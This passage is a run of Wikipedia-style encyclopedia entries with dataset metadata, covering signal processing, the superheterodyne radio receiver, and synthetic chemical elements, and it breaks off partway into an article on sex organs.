ASICs, field-programmable gate arrays or specialized digital signal processors. Typical arithmetical operations include fixed-point and floating-point, real-valued and complex-valued, multiplication and addition. Other typical operations supported by the hardware are circular buffers and lookup tables. Examples of algorithms are the fast Fourier transform (FFT), finite impulse response (FIR) filter, Infinite impulse response (IIR) filter, and adaptive filters such as the Wiener and Kalman filters. Nonlinear Nonlinear signal processing involves the analysis and processing of signals produced from nonlinear systems and can be in the time, frequency, or spatiotemporal domains. Nonlinear systems can produce highly complex behaviors including bifurcations, chaos, harmonics, and subharmonics which cannot be produced or analyzed using linear methods. Polynomial signal processing is a type of non-linear signal processing, where polynomial systems may be interpreted as conceptually straightforward extensions of linear systems to the nonlinear case. Statistical Statistical signal processing is an approach which treats signals as stochastic processes, utilizing their statistical properties to perform signal processing tasks. Statistical techniques are widely used in signal processing applications. For example, one can model the probability distribution of noise incurred when photographing an image, and construct techniques based on this model to reduce the noise in the resulting image. Application fields Audio signal processing for electrical signals representing sound, such as speech or music Image processing in digital cameras, computers and various imaging systems Video processing for interpreting moving pictures Wireless communication waveform generations, demodulation, filtering, equalization Control systems Array processing for processing signals from arrays of sensors Process control a variety of signals are used, including the industry standard 4-20 mA current loop Seismology Feature extraction, such as image understanding and speech recognition. Quality improvement, such as noise reduction, image enhancement, and echo cancellation. Source coding including audio compression, image compression, and video compression. Genomic signal processing In geophysics, signal processing is used to amplify the signal vs the noise within time-series measurements of geophysical data. Processing is conducted within either the time domain or frequency domain, or both. In communication systems, signal processing may occur at: OSI layer 1 in the seven-layer OSI model, the physical layer (modulation, equalization, multiplexing, etc.); OSI layer 2, the data link layer (forward error correction); OSI layer 6, the presentation layer (source coding, including analog-to-digital conversion and data compression). Typical devices Filters for example analog (passive or active) or digital (FIR, IIR, frequency domain or stochastic filters, etc.) Samplers and analog-to-digital converters for signal acquisition and reconstruction, which involves measuring a physical signal, storing or transferring it as digital signal, and possibly later rebuilding the original signal or an approximation thereof. Signal compressors Digital signal processors (DSPs) Mathematical methods applied Differential equations - for modeling system behavior, connecting input and output relations in linear time-invariant systems. For instance, a low-pass filter such as an RC circuit can be modeled as a differential equation in signal processing, which allows one to compute the continuous output signal as function of the input or initial conditions. Recurrence relations Transform theory Time-frequency analysis for processing non-stationary signals Linear canonical transformation Spectral estimation for determining the spectral content (i.e., the distribution of power over frequency) of a time series Statistical signal processing analyzing and extracting information from signals and noise based on their stochastic properties Linear time-invariant system theory, and transform theory Polynomial signal processing analysis of systems which relate input and output using polynomials System identification and classification Calculus Code Complex analysis Vector spaces and Linear algebra Functional analysis Probability and stochastic processes Detection theory Estimation theory Optimization Numerical methods Time series Data mining for statistical analysis of relations between large quantities of variables (in this context representing many physical signals), to extract previously unknown interesting patterns
Technology
Basics_4
null
29341
https://en.wikipedia.org/wiki/Superheterodyne%20receiver
Superheterodyne receiver
A superheterodyne receiver, often shortened to superhet, is a type of radio receiver that uses frequency mixing to convert a received signal to a fixed intermediate frequency (IF) which can be more conveniently processed than the original carrier frequency. It was invented by French radio engineer and radio manufacturer Lucien Lévy. Virtually all modern radio receivers use the superheterodyne principle. Precursors Early radio Early Morse code radio broadcasts were produced using an alternator connected to a spark gap. The output signal was at a carrier frequency defined by the physical construction of the gap, modulated by the alternating current signal from the alternator. Since the output frequency of the alternator was generally in the audible range, this produces an audible amplitude modulated (AM) signal. Simple radio detectors filtered out the high-frequency carrier, leaving the modulation, which was passed on to the user's headphones as an audible signal of dots and dashes. In 1904, Ernst Alexanderson introduced the Alexanderson alternator, a device that directly produced radio frequency output with higher power and much higher efficiency than the older spark gap systems. In contrast to the spark gap, however, the output from the alternator was a pure carrier wave at a selected frequency. When detected on existing receivers, the dots and dashes would normally be inaudible, or "supersonic". Due to the filtering effects of the receiver, these signals generally produced a click or thump, which were audible but made determining dots from dashes difficult. In 1905, Canadian inventor Reginald Fessenden came up with the idea of using two Alexanderson alternators operating at closely spaced frequencies to broadcast two signals, instead of one. The receiver would then receive both signals, and as part of the detection process, only the beat frequency would exit the receiver. By selecting two carriers close enough that the beat frequency was audible, the resulting Morse code could once again be easily heard even in simple receivers. For instance, if the two alternators operated at frequencies 3 kHz apart, the output in the headphones would be dots or dashes of 3 kHz tone, making them easily audible. Fessenden coined the term "heterodyne", meaning "generated by a difference" (in frequency), to describe this system. The word is derived from the Greek roots hetero- "different", and -dyne "power". Regeneration Morse code was widely used in the early days of radio because it was both easy to produce and easy to receive. In contrast to voice broadcasts, the output of the amplifier didn't have to closely match the modulation of the original signal. As a result, any number of simple amplification systems could be used. One method used an interesting side-effect of early triode amplifier tubes. If both the plate (anode) and grid were connected to resonant circuits tuned to the same frequency and the stage gain was much higher than unity, stray capacitive coupling between the grid and the plate would cause the amplifier to go into oscillation. In 1913, Edwin Howard Armstrong described a receiver system that used this effect to produce audible Morse code output using a single triode. The output of the amplifier taken at the anode was connected back to the input through a "tickler", causing feedback that drove input signals well beyond unity. This caused the output to oscillate at a chosen frequency with great amplification. When the original signal cut off at the end of the dot or dash, the oscillation decayed and the sound disappeared after a short delay. Armstrong referred to this concept as a regenerative receiver, and it immediately became one of the most widely used systems of its era. Many radio systems of the 1920s were based on the regenerative principle, and it continued to be used in specialized roles into the 1940s, for instance in the IFF Mark II. Radio direction finding There was one role where the regenerative system was not suitable, even for Morse code sources, and that was the task of radio direction finding, RDF. The regenerative system was highly non-linear, amplifying any signal above a certain threshold by a huge amount, sometimes so large it caused it to turn into a transmitter (which was the entire basis of the original IFF system). In RDF, the strength of the signal is used to determine the location of the transmitter, so one requires linear amplification to allow the strength of the original signal, often very weak, to be accurately measured. To address this need, RDF systems of the era used triodes operating below unity. To get a usable signal from such a system, tens or even hundreds of triodes had to be used, connected together anode-to-grid. These amplifiers drew enormous amounts of power and required a team of maintenance engineers to keep them running. Nevertheless, the strategic value of direction finding on weak signals was so high that the British Admiralty felt the high cost was justified. History Conceptualisation Although a number of researchers discovered the superheterodyne concept, filing patents only months apart, American engineer Edwin Armstrong is often credited with the concept. He came across it while considering better ways to produce RDF receivers. He had concluded that moving to higher "short wave" frequencies would make RDF more useful and was looking for practical means to build a linear amplifier for these signals. At the time, short wave was anything above about 500 kHz, beyond any existing amplifier's capabilities. It had been noticed that when a regenerative receiver went into oscillation, other nearby receivers would start picking up other stations as well. Armstrong (and others) eventually deduced that this was caused by a "supersonic heterodyne" between the station's carrier frequency and the regenerative receiver's oscillation frequency. When the first receiver began to oscillate at high outputs, its signal would flow back out through the antenna to be received on any nearby receiver. On that receiver, the two signals mixed just as they did in the original heterodyne concept, producing an output that is the difference in frequency between the two signals. For instance, consider a lone receiver that was tuned to a station at 300 kHz. If a second receiver is set up nearby and set to 400 kHz with high gain, it will begin to give off a 400 kHz signal that will be received in the first receiver. In that receiver, the two signals will mix to produce four outputs, one at the original 300 kHz, another at the received 400 kHz, and two more, the difference at 100 kHz and the sum at 700 kHz. This is the same effect that Fessenden had proposed, but in his system the two frequencies were deliberately chosen so the beat frequency was audible. In this case, all of the frequencies are well beyond the audible range, and thus "supersonic", giving rise to the name superheterodyne. Armstrong realized that this effect was a potential solution to the "short wave" amplification problem, as the "difference" output still retained its original modulation, but on a lower carrier frequency. In the example above, one can amplify the 100 kHz beat signal and retrieve the original information from that, the receiver does not have to tune in the higher 300 kHz original carrier. By selecting an appropriate set of frequencies, even very high-frequency signals could be "reduced" to a frequency that could be amplified by existing systems. For instance, to receive a signal at 1500 kHz, far beyond the range of efficient amplification at the time, one could set up an oscillator at, for example, 1560 kHz. Armstrong referred to this as the "local oscillator" or LO. As its signal was being fed into a second receiver in the same device, it did not have to be powerful, generating only enough signal to be roughly similar in strength to that of the received station, although in practice LOs tend to be relatively strong signals. When the signal from the LO mixes with the station's, one of the outputs will be the heterodyne difference frequency, in this case, 60 kHz. He termed this resulting difference the "intermediate frequency" often abbreviated to "IF". In December 1919, Major E. H. Armstrong gave publicity to an indirect method of obtaining short-wave amplification, called the super-heterodyne. The idea is to reduce the incoming frequency, which may be, for example 1,500,000 cycles (200 meters), to some suitable super-audible frequency that can be amplified efficiently, then passing this current through an intermediate frequency amplifier, and finally rectifying and carrying on to one or two stages of audio frequency amplification. The "trick" to the superheterodyne is that by changing the LO frequency you can tune in different stations. For instance, to receive a signal at 1300 kHz, one could tune the LO to 1360 kHz, resulting in the same 60 kHz IF. This means the amplifier section can be tuned to operate at a single frequency, the design IF, which is much easier to do efficiently. Development Armstrong put his ideas into practice, and the technique was soon adopted by the military. It was less popular when commercial radio broadcasting began in the 1920s, mostly due to the need for an extra tube (for the oscillator), the generally higher cost of the receiver, and the level of skill required to operate it. For early domestic radios, tuned radio frequency receivers (TRF) were more popular because they were cheaper, easier for a non-technical owner to use, and less costly to operate. Armstrong eventually sold his superheterodyne patent to Westinghouse, which then sold it to Radio Corporation of America (RCA), the latter monopolizing the market for superheterodyne receivers until 1930. Because the original motivation for the superhet was the difficulty of using the triode amplifier at high frequencies, there was an advantage in using a lower intermediate frequency. During this era, many receivers used an IF frequency of only 30 kHz. These low IF frequencies, often using IF transformers based on the self-resonance of iron-core transformers, had poor image frequency rejection, but overcame the difficulty in using triodes at radio frequencies in a manner that competed favorably with the less robust neutrodyne TRF receiver. Higher IF frequencies (455 kHz was a common standard) came into use in later years, after the invention of the tetrode and pentode as amplifying tubes, largely solving the problem of image rejection. Even later, however, low IF frequencies (typically 60 kHz) were again used in the second (or third) IF stage of double or triple-conversion communications receivers to take advantage of the selectivity more easily achieved at lower IF frequencies, with image-rejection accomplished in the earlier IF stage(s) which were at a higher IF frequency. In the 1920s, at these low frequencies, commercial IF filters looked very similar to 1920s audio interstage coupling transformers, had similar construction, and were wired up in an almost identical manner, so they were referred to as "IF transformers". By the mid-1930s, superheterodynes using much higher intermediate frequencies (typically around 440–470 kHz) used tuned transformers more similar to other RF applications. The name "IF transformer" was retained, however, now meaning "intermediate frequency". Modern receivers typically use a mixture of ceramic resonators or surface acoustic wave resonators and traditional tuned-inductor IF transformers. By the 1930s, improvements in vacuum tube technology rapidly eroded the TRF receiver's cost advantages, and the explosion in the number of broadcasting stations created a demand for cheaper, higher-performance receivers. The introduction of an additional grid in a vacuum tube, but before the more modern screen-grid tetrode, included the tetrode with two control grids; this tube combined the mixer and oscillator functions, first used in the so-called autodyne mixer. This was rapidly followed by the introduction of tubes specifically designed for superheterodyne operation, most notably the pentagrid converter. By reducing the tube count (with each tube stage being the main factor affecting cost in this era), this further reduced the advantage of TRF and regenerative receiver designs. By the mid-1930s, commercial production of TRF receivers was largely replaced by superheterodyne receivers. By the 1940s, the vacuum-tube superheterodyne AM broadcast receiver was refined into a cheap-to-manufacture design called the "All American Five" because it used five vacuum tubes: usually a converter (mixer/local oscillator), an IF amplifier, a detector/audio amplifier, audio power amplifier, and a rectifier. Since this time, the superheterodyne design was used for almost all commercial radio and TV receivers. Patent battles French engineer Lucien Lévy filed a patent application for the superheterodyne principle in August 1917 with brevet n° 493660. Armstrong also filed his patent in 1917. Levy filed his original disclosure about seven months before Armstrong's. German inventor Walter H. Schottky also filed a patent in 1918. At first the US recognised Armstrong as the inventor, and his US Patent 1,342,885 was issued on 8 June 1920. After various changes and court hearings Lévy was awarded US patent No 1,734,938 that included seven of the nine claims in Armstrong's application, while the two remaining claims were granted to Alexanderson of GE and Kendall of AT&T. Principle of operation The antenna collects the radio signal. The tuned RF stage with optional RF amplifier provides some initial selectivity; it is necessary to suppress the image frequency, and may also serve to prevent strong out-of-passband signals from saturating the initial amplifier. A local oscillator provides the mixing frequency; it is usually a variable frequency oscillator which is used to tune the receiver to different stations. The frequency mixer does the actual heterodyning that gives the superheterodyne its name; it changes the incoming radio frequency signal to a higher or lower, fixed, intermediate frequency (IF). The IF band-pass filter and amplifier supply most of the gain and the narrowband filtering for the radio. The demodulator extracts the audio or other modulation from the IF radio frequency. The extracted signal is then amplified by the audio amplifier. Circuit description To receive a radio signal, a suitable antenna is required. The output of the antenna may be very small, often only a few microvolts. The signal from the antenna is tuned and may be amplified in a so-called radio frequency (RF) amplifier, although this stage is often omitted. One or more tuned circuits at this stage block frequencies that are far removed from the intended reception frequency. To tune the receiver to a particular station, the frequency of the local oscillator is controlled by the tuning knob (for instance). Tuning of the local oscillator and the RF stage may use a variable capacitor, or varicap diode. The tuning of one (or more) tuned circuits in the RF stage must track the tuning of the local oscillator. Local oscillator and mixer The signal is then fed into a circuit where it is mixed with a sine wave from a variable frequency oscillator known as the local oscillator (LO). The mixer uses a non-linear component to produce both sum and difference beat frequency signals, each one containing the modulation in the desired signal. The output of the mixer may include the original RF signal at fRF, the local oscillator signal at fLO, and the two new heterodyne frequencies fRF + fLO and fRF − fLO. The mixer may inadvertently produce additional frequencies such as third- and higher-order intermodulation products. Ideally, the IF bandpass filter removes all but the desired IF signal at fIF. The IF signal contains the original modulation (transmitted information) that the received radio signal had at fRF. The frequency of the local oscillator fLO is set so the desired reception radio frequency fRF mixes to fIF. There are two choices for the local oscillator frequency because of the correspondence between positive and negative frequencies. If the local oscillator frequency is less than the desired reception frequency, it is called low-side injection (fIF = fRF − fLO); if the local oscillator is higher, then it is called high-side injection (fIF = fLO − fRF). The mixer will process not only the desired input signal at fRF, but also all signals present at its inputs. There will be many mixer products (heterodynes). Most other signals produced by the mixer (such as due to stations at nearby frequencies) can be filtered out in the IF tuned amplifier; that gives the superheterodyne receiver its superior performance. However, if fLO is set to fRF + fIF, then an incoming radio signal at fLO + fIF will also produce a heterodyne at fIF; the frequency fLO + fIF is called the image frequency and must be rejected by the tuned circuits in the RF stage. The image frequency is 2 fIF higher (or lower) than the desired frequency fRF, so employing a higher IF frequency fIF increases the receiver's image rejection without requiring additional selectivity in the RF stage. To suppress the unwanted image, the tuning of the RF stage and the LO may need to "track" each other. In some cases, a narrow-band receiver can have a fixed tuned RF amplifier. In that case, only the local oscillator frequency is changed. In most cases, a receiver's input band is wider than its IF center frequency. For example, a typical AM broadcast band receiver covers 510 kHz to 1655 kHz (a roughly 1160 kHz input band) with a 455 kHz IF frequency; an FM broadcast band receiver covers 88 MHz to 108 MHz band with a 10.7 MHz IF frequency. In that situation, the RF amplifier must be tuned so the IF amplifier does not see two stations at the same time. If the AM broadcast band receiver LO were set at 1200 kHz, it would see stations at both 745 kHz (1200−455 kHz) and 1655 kHz. Consequently, the RF stage must be designed so that any stations that are twice the IF frequency away are significantly attenuated. The tracking can be done with a multi-section variable capacitor or some varactors driven by a common control voltage. An RF amplifier may have tuned circuits at both its input and its output, so three or more tuned circuits may be tracked. In practice, the RF and LO frequencies need to track closely but not perfectly. In the days of tube (valve) electronics, it was common for superheterodyne receivers to combine the functions of the local oscillator and the mixer in a single tube, leading to a savings in power, size, and especially cost. A single pentagrid converter tube would oscillate and also provide signal amplification as well as frequency mixing. The mixer tube or transistor is sometimes called the first detector, while the demodulator that extracts the modulation from the IF signal is called the second detector. In a dual-conversion superhet there are two mixers, so the demodulator is called the third detector. IF amplifier The stages of an intermediate frequency amplifier ("IF amplifier" or "IF strip") are tuned to a fixed frequency that does not change as the receiving frequency changes. The fixed frequency simplifies optimization of the IF amplifier. The IF amplifier is selective around its center frequency fIF. The fixed center frequency allows the stages of the IF amplifier to be carefully tuned for best performance (this tuning is called "aligning" the IF amplifier). If the center frequency changed with the receiving frequency, then the IF stages would have had to track their tuning. That is not the case with the superheterodyne. Normally, the IF center frequency fIF is chosen to be less than the range of desired reception frequencies fRF. That is because it is easier and less expensive to get high selectivity at a lower frequency using tuned circuits. The bandwidth of a tuned circuit with a certain Q is proportional to the frequency itself (and what's more, a higher Q is achievable at lower frequencies), so fewer IF filter stages are required to achieve the same selectivity. Also, it is easier and less expensive to get high gain at a lower frequencies. However, in many modern receivers designed for reception over a wide frequency range (e.g. scanners and spectrum analyzers) a first IF frequency higher than the reception frequency is employed in a double conversion configuration. For instance, the Rohde & Schwarz EK-070 VLF/HF receiver covers 10 kHz to 30 MHz. It has a band switched RF filter and mixes the input to a first IF of 81.4 MHz and a second IF frequency of 1.4 MHz. The first LO frequency is 81.4 to 111.4 MHz, a reasonable range for an oscillator. But if the original RF range of the receiver were to be converted directly to the 1.4 MHz intermediate frequency, the LO frequency would need to cover 1.4-31.4 MHz which cannot be accomplished using tuned circuits (a variable capacitor with a fixed inductor would need a capacitance range of 500:1). Image rejection is never an issue with such a high IF frequency. The first IF stage uses a crystal filter with a 12 kHz bandwidth. There is a second frequency conversion (making a triple-conversion receiver) that mixes the 81.4 MHz first IF with 80 MHz to create a 1.4 MHz second IF. Image rejection for the second IF is not an issue as the first IF has a bandwidth of much less than 2.8 MHz. To avoid interference to receivers, licensing authorities will avoid assigning common IF frequencies to transmitting stations. Standard intermediate frequencies used are 455 kHz for medium-wave AM radio, 10.7 MHz for broadcast FM receivers, 38.9 MHz (Europe) or 45 MHz (US) for television, and 70 MHz for satellite and terrestrial microwave equipment. To avoid tooling costs associated with these components, most manufacturers then tended to design their receivers around a fixed range of frequencies offered, which resulted in a worldwide de facto standardization of intermediate frequencies. In early superhets, the IF stage was often a regenerative stage providing the sensitivity and selectivity with fewer components. Such superhets were called super-gainers or regenerodynes. This is also called a Q multiplier, involving a small modification to an existing receiver especially for the purpose of increasing selectivity. IF bandpass filter The IF stage includes a filter and/or multiple tuned circuits to achieve the desired selectivity. This filtering must have a band pass equal to or less than the frequency spacing between adjacent broadcast channels. Ideally a filter would have a high attenuation to adjacent channels, but maintain a flat response across the desired signal spectrum in order to retain the quality of the received signal. This may be obtained using one or more dual tuned IF transformers, a quartz crystal filter, or a multipole ceramic crystal filter. In the case of television receivers, no other technique was able to produce the precise bandpass characteristic needed for vestigial sideband reception, such as that used in the NTSC system first approved by the US in 1941. By the 1980s, multi-component capacitor-inductor filters had been replaced with precision electromechanical surface acoustic wave (SAW) filters. Fabricated by precision laser milling techniques, SAW filters are cheaper to produce, can be made to extremely close tolerances, and are very stable in operation. Demodulator The received signal is now processed by the demodulator stage where the audio signal (or other baseband signal) is recovered and then further amplified. AM demodulation requires envelope detection, which can be achieved by means of rectification and a low-pass filter (which can be as simple as an RC circuit) to remove remnants of the intermediate frequency. FM signals may be detected using a discriminator, ratio detector, or phase-locked loop. Continuous wave and single sideband signals require a product detector using a so-called beat frequency oscillator, and there are other techniques used for different types of modulation. The resulting audio signal (for instance) is then amplified and drives a loudspeaker. When so-called high-side injection has been used, where the local oscillator is at a higher frequency than the received signal (as is common), then the frequency spectrum of the original signal will be reversed. This must be taken into account by the demodulator (and in the IF filtering) in the case of certain types of modulation such as single sideband. Multiple conversion To overcome obstacles such as image response, some receivers use multiple successive stages of frequency conversion and multiple IFs of different values. A receiver with two frequency conversions and IFs is called a dual conversion superheterodyne, and one with three IFs is called a triple conversion superheterodyne. The main reason that this is done is that with a single IF there is a tradeoff between low image response and selectivity. The separation between the received frequency and the image frequency is equal to twice the IF frequency, so the higher the IF, the easier it is to design an RF filter to remove the image frequency from the input and achieve low image response. However, the higher the IF, the more difficult it is to achieve high selectivity in the IF filter. At shortwave frequencies and above, the difficulty in obtaining sufficient selectivity in the tuning with the high IFs needed for low image response impacts performance. To solve this problem two IF frequencies can be used, first converting the input frequency to a high IF to achieve low image response, and then converting this frequency to a low IF to achieve good selectivity in the second IF filter. To improve tuning, a third IF can be used. For example, for a receiver that can tune from 500 kHz to 30 MHz, three frequency converters might be used. With a 455 kHz IF it is easy to get adequate front end selectivity with broadcast band (under 1600 kHz) signals. For example, if the station being received is on 600 kHz, the local oscillator can be set to 1055 kHz, giving an image on (-600+1055=) 455 kHz. But a station on 1510 kHz could also potentially produce an image at (1510-1055=) 455 kHz and so cause image interference. However, because 600 kHz and 1510 kHz are so far apart, it is easy to design the front end tuning to reject the 1510 kHz frequency. However at 30 MHz, things are different. The oscillator would be set to 30.455 MHz to produce a 455 kHz IF, but a station on 30.910 would also produce a 455 kHz beat, so both stations would be heard at the same time. But it is virtually impossible to design an RF tuned circuit that can adequately discriminate between 30 MHz and 30.91 MHz, so one approach is to "bulk downconvert" whole sections of the shortwave bands to a lower frequency, where adequate front-end tuning is easier to arrange. For example, the ranges 29 MHz to 30 MHz; 28 MHz to 29 MHz etc. might be converted down to 2 MHz to 3 MHz, there they can be tuned more conveniently. This is often done by first converting each "block" up to a higher frequency (typically 40 MHz) and then using a second mixer to convert it down to the 2 MHz to 3 MHz range. The 2 MHz to 3 MHz "IF" is basically another self-contained superheterodyne receiver, most likely with a standard IF of 455 kHz. Modern designs Microprocessor technology allows replacing the superheterodyne receiver design by a software-defined radio architecture, where the IF processing after the initial IF filter is implemented in software. This technique is already in use in certain designs, such as very low-cost FM radios incorporated into mobile phones, since the system already has the necessary microprocessor. Radio transmitters may also use a mixer stage to produce an output frequency, working more or less as the reverse of a superheterodyne receiver. Advantages and disadvantages Superheterodyne receivers have essentially replaced all previous receiver designs. The development of modern semiconductor electronics negated the advantages of designs (such as the regenerative receiver) that used fewer vacuum tubes. The superheterodyne receiver offers superior sensitivity, frequency stability and selectivity. Compared with the tuned radio frequency receiver (TRF) design, superhets offer better stability because a tuneable oscillator is more easily realized than a tuneable amplifier. Operating at a lower frequency, IF filters can give narrower passbands at the same Q factor than an equivalent RF filter. A fixed IF also allows the use of a crystal filter or similar technologies that cannot be tuned. Regenerative and super-regenerative receivers offered a high sensitivity, but often suffer from stability problems making them difficult to operate. Although the advantages of the superhet design are overwhelming, there are a few drawbacks that need to be tackled in practice. Image frequency (fIMAGE) One major disadvantage to the superheterodyne receiver is the problem of image frequency. In heterodyne receivers, an image frequency is an undesired input frequency equal to the station frequency plus (or minus) twice the intermediate frequency. The image frequency results in two stations being received at the same time, thus producing interference. Reception at the image frequency can be combated through tuning (filtering) at the antenna and RF stage of the superheterodyne receiver. For example, an AM broadcast station at 580 kHz is tuned on a receiver with a 455 kHz IF. The local oscillator is tuned to 1035 kHz. But a signal at 1490 kHz is also 455 kHz away from the local oscillator; so both the desired signal and the image, when mixed with the local oscillator, will appear at the intermediate frequency. This image frequency is within the AM broadcast band. Practical receivers have a tuning stage before the converter, to greatly reduce the amplitude of image frequency signals; additionally, broadcasting stations in the same area have their frequencies assigned to avoid such images. The unwanted frequency is called the image of the wanted frequency, because it is the "mirror image" of the desired frequency reflected about . A receiver with inadequate filtering at its input will pick up signals at two different frequencies simultaneously: the desired frequency and the image frequency. A radio reception which happens to be at the image frequency can interfere with reception of the desired signal, and noise (static) around the image frequency can decrease the receiver's signal-to-noise ratio (SNR) by up to 3dB. Early Autodyne receivers typically used IFs of only 150 kHz or so. As a consequence, most Autodyne receivers required greater front-end selectivity, often involving double-tuned coils, to avoid image interference. With the later development of tubes able to amplify well at higher frequencies, higher IF frequencies came into use, reducing the problem of image interference. Typical consumer radio receivers have only a single tuned circuit in the RF stage. Sensitivity to the image frequency can be minimized only by (1) a filter that precedes the mixer or (2) a more complex mixer circuit to suppress the image; this is rarely used. In most tunable receivers using a single IF frequency, the RF stage includes at least one tuned circuit in the RF front end whose tuning is performed in tandem with the local oscillator. In double (or triple) conversion receivers in which the first conversion uses a fixed local oscillator, this may rather be a fixed bandpass filter which accommodates the frequency range being mapped to the first IF frequency range. Image rejection is an important factor in choosing the intermediate frequency of a receiver. The farther apart the bandpass frequency and the image frequency are, the more the bandpass filter will attenuate any interfering image signal. Since the frequency separation between the bandpass and the image frequency is , a higher intermediate frequency improves image rejection. It may be possible to use a high enough first IF that a fixed-tuned RF stage can reject any image signals. The ability of a receiver to reject interfering signals at the image frequency is measured by the image rejection ratio. This is the ratio (in decibels) of the output of the receiver from a signal at the received frequency, to its output for an equal-strength signal at the image frequency. Local oscillator radiation It can be difficult to keep stray radiation from the local oscillator below the level that a nearby receiver can detect. If the receiver's local oscillator can reach the antenna it will act as a low-power CW transmitter. Consequently, what is meant to be a receiver can itself create radio interference. In intelligence operations, local oscillator radiation gives a means to detect a covert receiver and its operating frequency. The method was used by MI5 during Operation RAFTER. This same technique is also used in radar detector detectors used by traffic police in jurisdictions where radar detectors are illegal. Local oscillator radiation is most prominent in receivers in which the antenna signal is connected directly to the mixer (which itself receives the local oscillator signal) rather than from receivers in which an RF amplifier stage is used in between. Thus it is more of a problem with inexpensive receivers and with receivers at such high frequencies (especially microwave) where RF amplifying stages are difficult to implement. Local oscillator sideband noise Local oscillators typically generate a single frequency signal that has negligible amplitude modulation but some random phase modulation which spreads some of the signal's energy into sideband frequencies. That causes a corresponding widening of the receiver's frequency response, which would defeat the aim to make a very narrow bandwidth receiver such as to receive low-rate digital signals. Care needs to be taken to minimize oscillator phase noise, usually by ensuring that the oscillator never enters a non-linear mode.
Technology
Broadcasting
null
29365
https://en.wikipedia.org/wiki/Synthetic%20element
Synthetic element
A synthetic element is one of 24 known chemical elements that do not occur naturally on Earth: they have been created by human manipulation of fundamental particles in a nuclear reactor, a particle accelerator, or the explosion of an atomic bomb; thus, they are called "synthetic", "artificial", or "man-made". The synthetic elements are those with atomic numbers 95–118, as shown in purple on the accompanying periodic table: these 24 elements were first created between 1944 and 2010. The mechanism for the creation of a synthetic element is to force additional protons into the nucleus of an element with an atomic number lower than 95. All known (see: Island of stability) synthetic elements are unstable, but they decay at widely varying rates; the half-lives of their longest-lived isotopes range from microseconds to millions of years. Five more elements that were first created artificially are strictly speaking not synthetic because they were later found in nature in trace quantities: 43Tc, 61Pm, 85At, 93Np, and 94Pu, though are sometimes classified as synthetic alongside exclusively artificial elements. The first, technetium, was created in 1937. Plutonium (Pu, atomic number 94), first synthesized in 1940, is another such element. It is the element with the largest number of protons (atomic number) to occur in nature, but it does so in such tiny quantities that it is far more practical to synthesize it. Plutonium is known mainly for its use in atomic bombs and nuclear reactors. No elements with atomic numbers greater than 99 have any uses outside of scientific research, since they have extremely short half-lives, and thus have never been produced in large quantities. Properties All elements with atomic number greater than 94 decay quickly enough into lighter elements such that any atoms of these that may have existed when the Earth formed (about 4.6 billion years ago) have long since decayed. Synthetic elements now present on Earth are the product of atomic bombs or experiments that involve nuclear reactors or particle accelerators, via nuclear fusion or neutron absorption. Atomic mass for natural elements is based on weighted average abundance of natural isotopes in Earth's crust and atmosphere. For synthetic elements, there is no "natural isotope abundance". Therefore, for synthetic elements the total nucleon count (protons plus neutrons) of the most stable isotope, i.e., the isotope with the longest half-life—is listed in brackets as the atomic mass. History Technetium The first element to be synthesized, rather than discovered in nature, was technetium in 1937. This discovery filled a gap in the periodic table, and the fact that technetium has no stable isotopes explains its natural absence on Earth (and the gap). With the longest-lived isotope of technetium, 97Tc, having a 4.21-million-year half-life, no technetium remains from the formation of the Earth. Only minute traces of technetium occur naturally in Earth's crust—as a product of spontaneous fission of 238U, or from neutron capture in molybdenum—but technetium is present naturally in red giant stars. Curium The first entirely synthetic element to be made was curium, synthesized in 1944 by Glenn T. Seaborg, Ralph A. James, and Albert Ghiorso by bombarding plutonium with alpha particles. Eight others Synthesis of americium, berkelium, and californium followed soon. Einsteinium and fermium were discovered by a team of scientists led by Albert Ghiorso in 1952 while studying the composition of radioactive debris from the detonation of the first hydrogen bomb. The isotopes synthesized were einsteinium-253, with a half-life of 20.5 days, and fermium-255, with a half-life of about 20 hours. The creation of mendelevium, nobelium, and lawrencium followed. Rutherfordium and dubnium During the height of the Cold War, teams from the Soviet Union and the United States independently created rutherfordium and dubnium. The naming and credit for synthesis of these elements remained unresolved for many years, but eventually, shared credit was recognized by IUPAC/IUPAP in 1992. In 1997, IUPAC decided to give dubnium its current name honoring the city of Dubna where the Russian team worked since American-chosen names had already been used for many existing synthetic elements, while the name rutherfordium (chosen by the American team) was accepted for element 104. The last thirteen Meanwhile, the American team had created seaborgium, and the next six elements had been created by a German team: bohrium, hassium, meitnerium, darmstadtium, roentgenium, and copernicium. Element 113, nihonium, was created by a Japanese team; the last five known elements, flerovium, moscovium, livermorium, tennessine, and oganesson, were created by Russian–American collaborations and complete the seventh row of the periodic table. List of synthetic elements The following elements do not occur naturally on Earth. All are transuranium elements and have atomic numbers of 95 and higher. Other elements usually produced through synthesis All elements with atomic numbers 1 through 94 occur naturally at least in trace quantities, but the following elements are often produced through synthesis. Technetium, promethium, astatine, neptunium, and plutonium were discovered through synthesis before being found in nature.
Physical sciences
Chemical element groups
null
29369
https://en.wikipedia.org/wiki/Sex%20organ
Sex organ
A sex organ, also known as a reproductive organ, is a part of an organism that is involved in sexual reproduction. Sex organs constitute the primary sex characteristics of an organism. Sex organs are responsible for producing and transporting gametes, as well as facilitating fertilization and supporting the development and birth of offspring. Sex organs are found in many species of animals and plants, with their features varying depending on the species. Sex organs are typically differentiated into male and female types. In animals (including humans), the male sex organs include the testicles, epididymides, and penis; the female sex organs include the clitoris, ovaries, oviducts, and vagina. The testicle in the male and the ovary in the female are called the primary sex organs. All other sex-related organs are known as secondary sex organs. The outer parts are known as the genitals or external genitalia, visible at birth in both sexes, while the inner parts are referred to as internal genitalia, which in both sexes, are always hidden. In plants, male reproductive structures include stamens in flowering plants, which produce pollen. Female reproductive structures, such as pistils in flowering plants, produce ovules and receive pollen for fertilization. Mosses, ferns, and some similar plants have gametangia for reproductive organs, which are part of the gametophyte. The flowers of flowering plants produce pollen and egg cells, but the sex organs themselves are inside the gametophytes within the pollen and the ovule. Coniferous plants likewise produce their sexually reproductive structures within the gametophytes contained within the cones and pollen. The cones and pollen are not themselves sexual organs. Together, the sex organs constitute an organism's reproductive system. Terminology The primary sex organs are the gonads, a pair of internal sex organs, which diverge into testicles following male development or into ovaries following female development. As primary sex organs, gonads generate reproductive gametes containing inheritable DNA. They also produce most of the primary hormones that affect sexual development, and regulate other sexual organs and sexually differentiated behaviors. Secondary sex organs are the rest of the reproductive system, whether internal or external. The Latin term genitalia, sometimes anglicized as genitals, is used to describe the externally visible sex organs. In general zoology, given the great variety in organs, physiologies, and behaviors involved in copulation, male genitalia are more strictly defined as "all male structures that are inserted in the female or that hold her near her gonopore during sperm 